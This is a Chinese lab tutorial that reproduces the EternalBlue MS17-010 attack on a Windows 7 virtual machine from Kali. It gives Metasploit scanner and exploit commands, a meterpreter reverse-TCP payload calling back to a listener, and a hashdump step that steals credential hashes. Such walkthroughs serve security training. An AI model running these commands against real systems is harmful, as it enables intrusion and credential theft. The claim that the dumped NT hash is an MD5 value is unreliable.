永恒之蓝MS17-010漏洞复现

永恒之蓝漏洞复现

  • 永恒之蓝漏洞简介
    • 准备工作
    • 命令功能
    • 查询靶机IP地址
    • Nmap工具
    • Msf框架
    • 相关搜索指令如下
    • 设置扫描对象
      • 扫描对方是否存在445端口
      • 开始攻击
    • 设置攻击载荷
    • 设置攻击机及靶机
    • 攻击成功
    • 简单演示
    • 攻击结束

永恒之蓝漏洞简介

本次漏洞复现主要展示如何复现一次永恒之蓝漏洞攻击,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,并且后来的WannaCry的勒索病毒变种也是由永恒之蓝的基础上改造而来

准备工作

我们在开始之前首先要准备以下内容:

  1. 虚拟机 ,Vmware16版本的虚拟机,可以大大减少蓝屏闪退的概率;
  2. Win7 x64靶机;
  3. Kali Linux攻击机;
  4. 关闭Win7靶机的防火墙及杀毒软件;
  5. 检查是否开启远程分享;
  6. 检查是否有安全更新等补丁;

命令功能

查询IP:Win7:ipconfig + Linux:ifconfig
nmap扫描:$ nmap -T4 -A -v 255.255.255.0(域名地址)
msf框架:$ msfconsole

查询靶机IP地址

我们在靶机Win7系统内使用win+R呼出控制台,并在控制台内输入cmd唤出dos窗口,并在窗口内输入ipconfig即可查询本虚拟机IP地址:

ipconfig
永恒之蓝MS17-010漏洞复现_第1张图片

Nmap工具

*nmap工具是Kali自带的

使用指令

$nmap -T4 -A -v 192.168.8.124

永恒之蓝MS17-010漏洞复现_第2张图片

查询出以下结果,其中可以看到靶机的445端口是开启的,因此我们可以继续下一步操作步骤

Msf框架

*我们通过指令$msfconsole进入Kali机的msf框架,本框架同是Kali虚拟机自带的,可以直接使用其查找相关工具,例如ms17-010永恒之蓝扫描套件等

$msfconsole

永恒之蓝MS17-010漏洞复现_第3张图片

在本框架中利用相关指令进行搜索和控制ms17-010扫描组件
永恒之蓝MS17-010漏洞复现_第4张图片

相关搜索指令如下

去MSF框架页面,输出以下 指令.

// msf6
use auxiliary/scanner/smb/smb_ms17_010; //选择扫描套件,本套件仅提供对靶机的扫描、嗅探功能

在这里插入图片描述

// msf6
use exploit/windows/smb/ms17_010_eternalblue; //选择攻击套件

永恒之蓝MS17-010漏洞复现_第5张图片

设置扫描对象

设置扫描对象为虚拟机IP地址,本IP地址为我个人虚拟机地址展示

set rhosts 192.168.8.124

在这里插入图片描述

扫描对方是否存在445端口

run

永恒之蓝MS17-010漏洞复现_第6张图片
在此可以看到 -Host is likely VULNERABLE to MS17-010! 这串代码的意思代表我们的靶机存在永恒之蓝漏洞,可以被攻击!

开始攻击

use exploit/windows/smb/ms17_010_eternalblue

永恒之蓝MS17-010漏洞复现_第7张图片
以上内容显示我们要进行攻击需要设置的内容,yes为必须设置,即靶机的IP、攻击的端口(默认445)及攻击对方的系统类型(默认1,即Win7)

show options

设置攻击载荷

payload设置有很多种不同的版本,可以在套件内直接查询,这里使用的即

set payload windows/x64/meterpreter/reverse_tcp

永恒之蓝MS17-010漏洞复现_第8张图片

设置攻击机及靶机

这里的内容就非常简单,单纯的设置靶机和监听机

set rhosts 192.168.8.124 //设置靶机

永恒之蓝MS17-010漏洞复现_第9张图片

set LHOST 192.168.8.125 //设置监听机

run //开始运行

攻击成功

出现下图代表攻击成功
永恒之蓝MS17-010漏洞复现_第10张图片

永恒之蓝MS17-010漏洞复现_第11张图片

简单演示

对部分指令进行一个简单地演示过程,我们此时已经拥有了对方主机的系统管理员权限

run windows/gather/smart_hashdump

永恒之蓝MS17-010漏洞复现_第12张图片
在这里插入图片描述
此时我们获得一串admin的内容,其中后方32ed87bdb5fdc5e9cba88547376818d4即为md5码,打开一个md5解码平台即可给其解码了
永恒之蓝MS17-010漏洞复现_第13张图片

攻击结束

至此本轮永恒之蓝复现已全部完成,其间遇到许多问题,包含虚拟机桥接、系统安全补丁未卸载、kali系统错误等等,如果有需要再将其补齐吧

你可能感兴趣的:(漏洞复现,网络,安全)